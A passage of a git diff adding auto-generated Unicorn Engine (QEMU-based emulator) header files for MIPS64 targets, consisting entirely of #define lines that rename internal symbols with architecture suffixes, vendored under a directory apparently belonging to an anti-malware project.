helper_maq_sa_w_qhlr_mips64 +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64 +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64 +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64 +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64 +#define helper_dmadd helper_dmadd_mips64 +#define helper_dmaddu helper_dmaddu_mips64 +#define helper_dmsub helper_dmsub_mips64 +#define helper_dmsubu helper_dmsubu_mips64 +#define helper_dinsv helper_dinsv_mips64 +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64 +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64 +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64 +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64 +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64 +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips64 +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips64 +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips64 +#define helper_cmp_le_qh helper_cmp_le_qh_mips64 +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips64 +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips64 +#define helper_cmp_le_pw helper_cmp_le_pw_mips64 +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64 +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64 +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64 +#define helper_pick_ob helper_pick_ob_mips64 +#define helper_pick_qh helper_pick_qh_mips64 +#define helper_pick_pw helper_pick_pw_mips64 +#define helper_packrl_pw helper_packrl_pw_mips64 +#define helper_dextr_w helper_dextr_w_mips64 +#define helper_dextr_r_w helper_dextr_r_w_mips64 +#define helper_dextr_rs_w helper_dextr_rs_w_mips64 +#define helper_dextr_l helper_dextr_l_mips64 +#define helper_dextr_r_l helper_dextr_r_l_mips64 +#define helper_dextr_rs_l helper_dextr_rs_l_mips64 +#define helper_dextr_s_h helper_dextr_s_h_mips64 +#define helper_dextp helper_dextp_mips64 +#define helper_dextpdp helper_dextpdp_mips64 +#define helper_dshilo helper_dshilo_mips64 +#define helper_dmthlip helper_dmthlip_mips64 +#define helper_dclo 
helper_dclo_mips64 +#define helper_dclz helper_dclz_mips64 +#define helper_dbitswap helper_dbitswap_mips64 +#define helper_lld helper_lld_mips64 +#define helper_scd helper_scd_mips64 +#define helper_sdl helper_sdl_mips64 +#define helper_sdr helper_sdr_mips64 +#define helper_ldm helper_ldm_mips64 +#define helper_sdm helper_sdm_mips64 +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64 +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64 +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64 +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64 +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64 +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64 +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64 +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64 +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64 +#define mips_reg_reset mips_reg_reset_mips64 +#define mips_reg_read mips_reg_read_mips64 +#define mips_reg_write mips_reg_write_mips64 +#define mips_tcg_init mips_tcg_init_mips64 +#define mips_cpu_list mips_cpu_list_mips64 +#define mips_release mips_release_mips64 +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips64 +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h new file mode 100644 index 0000000..afe0d47 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS64EL_H +#define UNICORN_AUTOGEN_MIPS64EL_H +#define arm_release arm_release_mips64el +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips64el +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips64el +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips64el +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips64el +#define 
helper_power_down helper_power_down_mips64el +#define check_exit_request check_exit_request_mips64el +#define address_space_unregister address_space_unregister_mips64el +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64el +#define phys_mem_clean phys_mem_clean_mips64el +#define tb_cleanup tb_cleanup_mips64el +#define memory_map memory_map_mips64el +#define memory_map_ptr memory_map_ptr_mips64el +#define memory_unmap memory_unmap_mips64el +#define memory_free memory_free_mips64el +#define free_code_gen_buffer free_code_gen_buffer_mips64el +#define helper_raise_exception helper_raise_exception_mips64el +#define tcg_enabled tcg_enabled_mips64el +#define tcg_exec_init tcg_exec_init_mips64el +#define memory_register_types memory_register_types_mips64el +#define cpu_exec_init_all cpu_exec_init_all_mips64el +#define vm_start vm_start_mips64el +#define resume_all_vcpus resume_all_vcpus_mips64el +#define a15_l2ctlr_read a15_l2ctlr_read_mips64el +#define a64_translate_init a64_translate_init_mips64el +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips64el +#define aa64_cacheop_access aa64_cacheop_access_mips64el +#define aa64_daif_access aa64_daif_access_mips64el +#define aa64_daif_write aa64_daif_write_mips64el +#define aa64_dczid_read aa64_dczid_read_mips64el +#define aa64_fpcr_read aa64_fpcr_read_mips64el +#define aa64_fpcr_write aa64_fpcr_write_mips64el +#define aa64_fpsr_read aa64_fpsr_read_mips64el +#define aa64_fpsr_write aa64_fpsr_write_mips64el +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips64el +#define aa64_zva_access aa64_zva_access_mips64el +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips64el +#define aarch64_restore_sp aarch64_restore_sp_mips64el +#define aarch64_save_sp aarch64_save_sp_mips64el +#define accel_find accel_find_mips64el +#define accel_init_machine accel_init_machine_mips64el +#define accel_type accel_type_mips64el +#define access_with_adjusted_size 
access_with_adjusted_size_mips64el +#define add128 add128_mips64el +#define add16_sat add16_sat_mips64el +#define add16_usat add16_usat_mips64el +#define add192 add192_mips64el +#define add8_sat add8_sat_mips64el +#define add8_usat add8_usat_mips64el +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips64el +#define add_cpreg_to_list add_cpreg_to_list_mips64el +#define addFloat128Sigs addFloat128Sigs_mips64el +#define addFloat32Sigs addFloat32Sigs_mips64el +#define addFloat64Sigs addFloat64Sigs_mips64el +#define addFloatx80Sigs addFloatx80Sigs_mips64el +#define add_qemu_ldst_label add_qemu_ldst_label_mips64el +#define address_space_access_valid address_space_access_valid_mips64el +#define address_space_destroy address_space_destroy_mips64el +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips64el +#define address_space_get_flatview address_space_get_flatview_mips64el +#define address_space_init address_space_init_mips64el +#define address_space_init_dispatch address_space_init_dispatch_mips64el +#define address_space_lookup_region address_space_lookup_region_mips64el +#define address_space_map address_space_map_mips64el +#define address_space_read address_space_read_mips64el +#define address_space_rw address_space_rw_mips64el +#define address_space_translate address_space_translate_mips64el +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64el +#define address_space_translate_internal address_space_translate_internal_mips64el +#define address_space_unmap address_space_unmap_mips64el +#define address_space_update_topology address_space_update_topology_mips64el +#define address_space_update_topology_pass address_space_update_topology_pass_mips64el +#define address_space_write address_space_write_mips64el +#define addrrange_contains addrrange_contains_mips64el +#define addrrange_end addrrange_end_mips64el +#define addrrange_equal addrrange_equal_mips64el +#define addrrange_intersection 
addrrange_intersection_mips64el +#define addrrange_intersects addrrange_intersects_mips64el +#define addrrange_make addrrange_make_mips64el +#define adjust_endianness adjust_endianness_mips64el +#define all_helpers all_helpers_mips64el +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips64el +#define alloc_entry alloc_entry_mips64el +#define always_true always_true_mips64el +#define arm1026_initfn arm1026_initfn_mips64el +#define arm1136_initfn arm1136_initfn_mips64el +#define arm1136_r2_initfn arm1136_r2_initfn_mips64el +#define arm1176_initfn arm1176_initfn_mips64el +#define arm11mpcore_initfn arm11mpcore_initfn_mips64el +#define arm926_initfn arm926_initfn_mips64el +#define arm946_initfn arm946_initfn_mips64el +#define arm_ccnt_enabled arm_ccnt_enabled_mips64el +#define arm_cp_read_zero arm_cp_read_zero_mips64el +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips64el +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips64el +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips64el +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips64el +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips64el +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips64el +#define arm_cpu_initfn arm_cpu_initfn_mips64el +#define arm_cpu_list arm_cpu_list_mips64el +#define cpu_loop_exit cpu_loop_exit_mips64el +#define arm_cpu_post_init arm_cpu_post_init_mips64el +#define arm_cpu_realizefn arm_cpu_realizefn_mips64el +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips64el +#define arm_cpu_register_types arm_cpu_register_types_mips64el +#define cpu_resume_from_signal cpu_resume_from_signal_mips64el +#define arm_cpus arm_cpus_mips64el +#define arm_cpu_set_pc arm_cpu_set_pc_mips64el +#define arm_cp_write_ignore arm_cp_write_ignore_mips64el +#define arm_current_el arm_current_el_mips64el +#define arm_dc_feature arm_dc_feature_mips64el +#define arm_debug_excp_handler arm_debug_excp_handler_mips64el +#define 
arm_debug_target_el arm_debug_target_el_mips64el +#define arm_el_is_aa64 arm_el_is_aa64_mips64el +#define arm_env_get_cpu arm_env_get_cpu_mips64el +#define arm_excp_target_el arm_excp_target_el_mips64el +#define arm_excp_unmasked arm_excp_unmasked_mips64el +#define arm_feature arm_feature_mips64el +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips64el +#define gen_intermediate_code gen_intermediate_code_mips64el +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips64el +#define arm_gen_test_cc arm_gen_test_cc_mips64el +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips64el +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips64el +#define arm_handle_psci_call arm_handle_psci_call_mips64el +#define arm_is_psci_call arm_is_psci_call_mips64el +#define arm_is_secure arm_is_secure_mips64el +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips64el +#define arm_ldl_code arm_ldl_code_mips64el +#define arm_lduw_code arm_lduw_code_mips64el +#define arm_log_exception arm_log_exception_mips64el +#define arm_reg_read arm_reg_read_mips64el +#define arm_reg_reset arm_reg_reset_mips64el +#define arm_reg_write arm_reg_write_mips64el +#define restore_state_to_opc restore_state_to_opc_mips64el +#define arm_rmode_to_sf arm_rmode_to_sf_mips64el +#define arm_singlestep_active arm_singlestep_active_mips64el +#define tlb_fill tlb_fill_mips64el +#define tlb_flush tlb_flush_mips64el +#define tlb_flush_page tlb_flush_page_mips64el +#define tlb_set_page tlb_set_page_mips64el +#define arm_translate_init arm_translate_init_mips64el +#define arm_v7m_class_init arm_v7m_class_init_mips64el +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips64el +#define ats_access ats_access_mips64el +#define ats_write ats_write_mips64el +#define bad_mode_switch bad_mode_switch_mips64el +#define bank_number bank_number_mips64el +#define bitmap_zero_extend bitmap_zero_extend_mips64el +#define bp_wp_matches bp_wp_matches_mips64el +#define breakpoint_invalidate 
breakpoint_invalidate_mips64el +#define build_page_bitmap build_page_bitmap_mips64el +#define bus_add_child bus_add_child_mips64el +#define bus_class_init bus_class_init_mips64el +#define bus_info bus_info_mips64el +#define bus_unparent bus_unparent_mips64el +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips64el +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips64el +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mips64el +#define call_recip_estimate call_recip_estimate_mips64el +#define can_merge can_merge_mips64el +#define capacity_increase capacity_increase_mips64el +#define ccsidr_read ccsidr_read_mips64el +#define check_ap check_ap_mips64el +#define check_breakpoints check_breakpoints_mips64el +#define check_watchpoints check_watchpoints_mips64el +#define cho cho_mips64el +#define clear_bit clear_bit_mips64el +#define clz32 clz32_mips64el +#define clz64 clz64_mips64el +#define cmp_flatrange_addr cmp_flatrange_addr_mips64el +#define code_gen_alloc code_gen_alloc_mips64el +#define commonNaNToFloat128 commonNaNToFloat128_mips64el +#define commonNaNToFloat16 commonNaNToFloat16_mips64el +#define commonNaNToFloat32 commonNaNToFloat32_mips64el +#define commonNaNToFloat64 commonNaNToFloat64_mips64el +#define commonNaNToFloatx80 commonNaNToFloatx80_mips64el +#define compute_abs_deadline compute_abs_deadline_mips64el +#define cond_name cond_name_mips64el +#define configure_accelerator configure_accelerator_mips64el +#define container_get container_get_mips64el +#define container_info container_info_mips64el +#define container_register_types container_register_types_mips64el +#define contextidr_write contextidr_write_mips64el +#define core_log_global_start core_log_global_start_mips64el +#define core_log_global_stop core_log_global_stop_mips64el +#define core_memory_listener core_memory_listener_mips64el +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips64el +#define cortex_a15_initfn 
cortex_a15_initfn_mips64el +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips64el +#define cortex_a8_initfn cortex_a8_initfn_mips64el +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips64el +#define cortex_a9_initfn cortex_a9_initfn_mips64el +#define cortex_m3_initfn cortex_m3_initfn_mips64el +#define count_cpreg count_cpreg_mips64el +#define countLeadingZeros32 countLeadingZeros32_mips64el +#define countLeadingZeros64 countLeadingZeros64_mips64el +#define cp_access_ok cp_access_ok_mips64el +#define cpacr_write cpacr_write_mips64el +#define cpreg_field_is_64bit cpreg_field_is_64bit_mips64el +#define cp_reginfo cp_reginfo_mips64el +#define cpreg_key_compare cpreg_key_compare_mips64el +#define cpreg_make_keylist cpreg_make_keylist_mips64el +#define cp_reg_reset cp_reg_reset_mips64el +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips64el +#define cpsr_read cpsr_read_mips64el +#define cpsr_write cpsr_write_mips64el +#define cptype_valid cptype_valid_mips64el +#define cpu_abort cpu_abort_mips64el +#define cpu_arm_exec cpu_arm_exec_mips64el +#define cpu_arm_gen_code cpu_arm_gen_code_mips64el +#define cpu_arm_init cpu_arm_init_mips64el +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips64el +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips64el +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64el +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64el +#define cpu_can_do_io cpu_can_do_io_mips64el +#define cpu_can_run cpu_can_run_mips64el +#define cpu_class_init cpu_class_init_mips64el +#define cpu_common_class_by_name cpu_common_class_by_name_mips64el +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips64el +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips64el +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips64el +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips64el +#define cpu_common_has_work cpu_common_has_work_mips64el +#define cpu_common_initfn 
cpu_common_initfn_mips64el +#define cpu_common_noop cpu_common_noop_mips64el +#define cpu_common_parse_features cpu_common_parse_features_mips64el +#define cpu_common_realizefn cpu_common_realizefn_mips64el +#define cpu_common_reset cpu_common_reset_mips64el +#define cpu_dump_statistics cpu_dump_statistics_mips64el +#define cpu_exec_init cpu_exec_init_mips64el +#define cpu_flush_icache_range cpu_flush_icache_range_mips64el +#define cpu_gen_init cpu_gen_init_mips64el +#define cpu_get_clock cpu_get_clock_mips64el +#define cpu_get_real_ticks cpu_get_real_ticks_mips64el +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mips64el +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips64el +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips64el +#define cpu_inb cpu_inb_mips64el +#define cpu_inl cpu_inl_mips64el +#define cpu_interrupt cpu_interrupt_mips64el +#define cpu_interrupt_handler cpu_interrupt_handler_mips64el +#define cpu_inw cpu_inw_mips64el +#define cpu_io_recompile cpu_io_recompile_mips64el +#define cpu_is_stopped cpu_is_stopped_mips64el +#define cpu_ldl_code cpu_ldl_code_mips64el +#define cpu_ldub_code cpu_ldub_code_mips64el +#define cpu_lduw_code cpu_lduw_code_mips64el +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips64el +#define cpu_mmu_index cpu_mmu_index_mips64el +#define cpu_outb cpu_outb_mips64el +#define cpu_outl cpu_outl_mips64el +#define cpu_outw cpu_outw_mips64el +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips64el +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips64el +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips64el +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips64el +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips64el +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64el +#define cpu_physical_memory_map cpu_physical_memory_map_mips64el +#define 
cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips64el +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips64el +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips64el +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips64el +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips64el +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64el +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips64el +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips64el +#define cpu_register cpu_register_mips64el +#define cpu_register_types cpu_register_types_mips64el +#define cpu_restore_state cpu_restore_state_mips64el +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips64el +#define cpu_single_step cpu_single_step_mips64el +#define cpu_tb_exec cpu_tb_exec_mips64el +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips64el +#define cpu_to_be64 cpu_to_be64_mips64el +#define cpu_to_le32 cpu_to_le32_mips64el +#define cpu_to_le64 cpu_to_le64_mips64el +#define cpu_type_info cpu_type_info_mips64el +#define cpu_unassigned_access cpu_unassigned_access_mips64el +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64el +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips64el +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips64el +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64el +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64el +#define crc32c_table crc32c_table_mips64el +#define create_new_memory_mapping create_new_memory_mapping_mips64el +#define csselr_write csselr_write_mips64el +#define cto32 cto32_mips64el +#define ctr_el0_access ctr_el0_access_mips64el +#define ctz32 ctz32_mips64el +#define ctz64 ctz64_mips64el +#define dacr_write dacr_write_mips64el +#define dbgbcr_write 
dbgbcr_write_mips64el +#define dbgbvr_write dbgbvr_write_mips64el +#define dbgwcr_write dbgwcr_write_mips64el +#define dbgwvr_write dbgwvr_write_mips64el +#define debug_cp_reginfo debug_cp_reginfo_mips64el +#define debug_frame debug_frame_mips64el +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips64el +#define define_arm_cp_regs define_arm_cp_regs_mips64el +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips64el +#define define_debug_regs define_debug_regs_mips64el +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips64el +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips64el +#define deposit32 deposit32_mips64el +#define deposit64 deposit64_mips64el +#define deregister_tm_clones deregister_tm_clones_mips64el +#define device_class_base_init device_class_base_init_mips64el +#define device_class_init device_class_init_mips64el +#define device_finalize device_finalize_mips64el +#define device_get_realized device_get_realized_mips64el +#define device_initfn device_initfn_mips64el +#define device_post_init device_post_init_mips64el +#define device_reset device_reset_mips64el +#define device_set_realized device_set_realized_mips64el +#define device_type_info device_type_info_mips64el +#define disas_arm_insn disas_arm_insn_mips64el +#define disas_coproc_insn disas_coproc_insn_mips64el +#define disas_dsp_insn disas_dsp_insn_mips64el +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips64el +#define disas_neon_data_insn disas_neon_data_insn_mips64el +#define disas_neon_ls_insn disas_neon_ls_insn_mips64el +#define disas_thumb2_insn disas_thumb2_insn_mips64el +#define disas_thumb_insn disas_thumb_insn_mips64el +#define disas_vfp_insn disas_vfp_insn_mips64el +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips64el +#define do_arm_semihosting do_arm_semihosting_mips64el +#define do_clz16 do_clz16_mips64el +#define do_clz8 do_clz8_mips64el +#define do_constant_folding do_constant_folding_mips64el +#define 
do_constant_folding_2 do_constant_folding_2_mips64el +#define do_constant_folding_cond do_constant_folding_cond_mips64el +#define do_constant_folding_cond2 do_constant_folding_cond2_mips64el +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips64el +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips64el +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips64el +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips64el +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips64el +#define do_ssat do_ssat_mips64el +#define do_usad do_usad_mips64el +#define do_usat do_usat_mips64el +#define do_v7m_exception_exit do_v7m_exception_exit_mips64el +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips64el +#define dummy_func dummy_func_mips64el +#define dummy_section dummy_section_mips64el +#define _DYNAMIC _DYNAMIC_mips64el +#define _edata _edata_mips64el +#define _end _end_mips64el +#define end_list end_list_mips64el +#define eq128 eq128_mips64el +#define ErrorClass_lookup ErrorClass_lookup_mips64el +#define error_copy error_copy_mips64el +#define error_exit error_exit_mips64el +#define error_get_class error_get_class_mips64el +#define error_get_pretty error_get_pretty_mips64el +#define error_setg_file_open error_setg_file_open_mips64el +#define estimateDiv128To64 estimateDiv128To64_mips64el +#define estimateSqrt32 estimateSqrt32_mips64el +#define excnames excnames_mips64el +#define excp_is_internal excp_is_internal_mips64el +#define extended_addresses_enabled extended_addresses_enabled_mips64el +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips64el +#define extract32 extract32_mips64el +#define extract64 extract64_mips64el +#define extractFloat128Exp extractFloat128Exp_mips64el +#define extractFloat128Frac0 extractFloat128Frac0_mips64el +#define extractFloat128Frac1 extractFloat128Frac1_mips64el +#define extractFloat128Sign extractFloat128Sign_mips64el +#define extractFloat16Exp extractFloat16Exp_mips64el +#define 
extractFloat16Frac extractFloat16Frac_mips64el +#define extractFloat16Sign extractFloat16Sign_mips64el +#define extractFloat32Exp extractFloat32Exp_mips64el +#define extractFloat32Frac extractFloat32Frac_mips64el +#define extractFloat32Sign extractFloat32Sign_mips64el +#define extractFloat64Exp extractFloat64Exp_mips64el +#define extractFloat64Frac extractFloat64Frac_mips64el +#define extractFloat64Sign extractFloat64Sign_mips64el +#define extractFloatx80Exp extractFloatx80Exp_mips64el +#define extractFloatx80Frac extractFloatx80Frac_mips64el +#define extractFloatx80Sign extractFloatx80Sign_mips64el +#define fcse_write fcse_write_mips64el +#define find_better_copy find_better_copy_mips64el +#define find_default_machine find_default_machine_mips64el +#define find_desc_by_name find_desc_by_name_mips64el +#define find_first_bit find_first_bit_mips64el +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips64el +#define find_ram_block find_ram_block_mips64el +#define find_ram_offset find_ram_offset_mips64el +#define find_string find_string_mips64el +#define find_type find_type_mips64el +#define _fini _fini_mips64el +#define flatrange_equal flatrange_equal_mips64el +#define flatview_destroy flatview_destroy_mips64el +#define flatview_init flatview_init_mips64el +#define flatview_insert flatview_insert_mips64el +#define flatview_lookup flatview_lookup_mips64el +#define flatview_ref flatview_ref_mips64el +#define flatview_simplify flatview_simplify_mips64el +#define flatview_unref flatview_unref_mips64el +#define float128_add float128_add_mips64el +#define float128_compare float128_compare_mips64el +#define float128_compare_internal float128_compare_internal_mips64el +#define float128_compare_quiet float128_compare_quiet_mips64el +#define float128_default_nan float128_default_nan_mips64el +#define float128_div float128_div_mips64el +#define float128_eq float128_eq_mips64el +#define float128_eq_quiet float128_eq_quiet_mips64el +#define float128_is_quiet_nan 
float128_is_quiet_nan_mips64el +#define float128_is_signaling_nan float128_is_signaling_nan_mips64el +#define float128_le float128_le_mips64el +#define float128_le_quiet float128_le_quiet_mips64el +#define float128_lt float128_lt_mips64el +#define float128_lt_quiet float128_lt_quiet_mips64el +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips64el +#define float128_mul float128_mul_mips64el +#define float128_rem float128_rem_mips64el +#define float128_round_to_int float128_round_to_int_mips64el +#define float128_scalbn float128_scalbn_mips64el +#define float128_sqrt float128_sqrt_mips64el +#define float128_sub float128_sub_mips64el +#define float128ToCommonNaN float128ToCommonNaN_mips64el +#define float128_to_float32 float128_to_float32_mips64el +#define float128_to_float64 float128_to_float64_mips64el +#define float128_to_floatx80 float128_to_floatx80_mips64el +#define float128_to_int32 float128_to_int32_mips64el +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64el +#define float128_to_int64 float128_to_int64_mips64el +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64el +#define float128_unordered float128_unordered_mips64el +#define float128_unordered_quiet float128_unordered_quiet_mips64el +#define float16_default_nan float16_default_nan_mips64el +#define float16_is_quiet_nan float16_is_quiet_nan_mips64el +#define float16_is_signaling_nan float16_is_signaling_nan_mips64el +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips64el +#define float16ToCommonNaN float16ToCommonNaN_mips64el +#define float16_to_float32 float16_to_float32_mips64el +#define float16_to_float64 float16_to_float64_mips64el +#define float32_abs float32_abs_mips64el +#define float32_add float32_add_mips64el +#define float32_chs float32_chs_mips64el +#define float32_compare float32_compare_mips64el +#define float32_compare_internal float32_compare_internal_mips64el +#define float32_compare_quiet 
float32_compare_quiet_mips64el +#define float32_default_nan float32_default_nan_mips64el +#define float32_div float32_div_mips64el +#define float32_eq float32_eq_mips64el +#define float32_eq_quiet float32_eq_quiet_mips64el +#define float32_exp2 float32_exp2_mips64el +#define float32_exp2_coefficients float32_exp2_coefficients_mips64el +#define float32_is_any_nan float32_is_any_nan_mips64el +#define float32_is_infinity float32_is_infinity_mips64el +#define float32_is_neg float32_is_neg_mips64el +#define float32_is_quiet_nan float32_is_quiet_nan_mips64el +#define float32_is_signaling_nan float32_is_signaling_nan_mips64el +#define float32_is_zero float32_is_zero_mips64el +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips64el +#define float32_le float32_le_mips64el +#define float32_le_quiet float32_le_quiet_mips64el +#define float32_log2 float32_log2_mips64el +#define float32_lt float32_lt_mips64el +#define float32_lt_quiet float32_lt_quiet_mips64el +#define float32_max float32_max_mips64el +#define float32_maxnum float32_maxnum_mips64el +#define float32_maxnummag float32_maxnummag_mips64el +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips64el +#define float32_min float32_min_mips64el +#define float32_minmax float32_minmax_mips64el +#define float32_minnum float32_minnum_mips64el +#define float32_minnummag float32_minnummag_mips64el +#define float32_mul float32_mul_mips64el +#define float32_muladd float32_muladd_mips64el +#define float32_rem float32_rem_mips64el +#define float32_round_to_int float32_round_to_int_mips64el +#define float32_scalbn float32_scalbn_mips64el +#define float32_set_sign float32_set_sign_mips64el +#define float32_sqrt float32_sqrt_mips64el +#define float32_squash_input_denormal float32_squash_input_denormal_mips64el +#define float32_sub float32_sub_mips64el +#define float32ToCommonNaN float32ToCommonNaN_mips64el +#define float32_to_float128 float32_to_float128_mips64el +#define float32_to_float16 
float32_to_float16_mips64el +#define float32_to_float64 float32_to_float64_mips64el +#define float32_to_floatx80 float32_to_floatx80_mips64el +#define float32_to_int16 float32_to_int16_mips64el +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64el +#define float32_to_int32 float32_to_int32_mips64el +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64el +#define float32_to_int64 float32_to_int64_mips64el +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64el +#define float32_to_uint16 float32_to_uint16_mips64el +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64el +#define float32_to_uint32 float32_to_uint32_mips64el +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64el +#define float32_to_uint64 float32_to_uint64_mips64el +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64el +#define float32_unordered float32_unordered_mips64el +#define float32_unordered_quiet float32_unordered_quiet_mips64el +#define float64_abs float64_abs_mips64el +#define float64_add float64_add_mips64el +#define float64_chs float64_chs_mips64el +#define float64_compare float64_compare_mips64el +#define float64_compare_internal float64_compare_internal_mips64el +#define float64_compare_quiet float64_compare_quiet_mips64el +#define float64_default_nan float64_default_nan_mips64el +#define float64_div float64_div_mips64el +#define float64_eq float64_eq_mips64el +#define float64_eq_quiet float64_eq_quiet_mips64el +#define 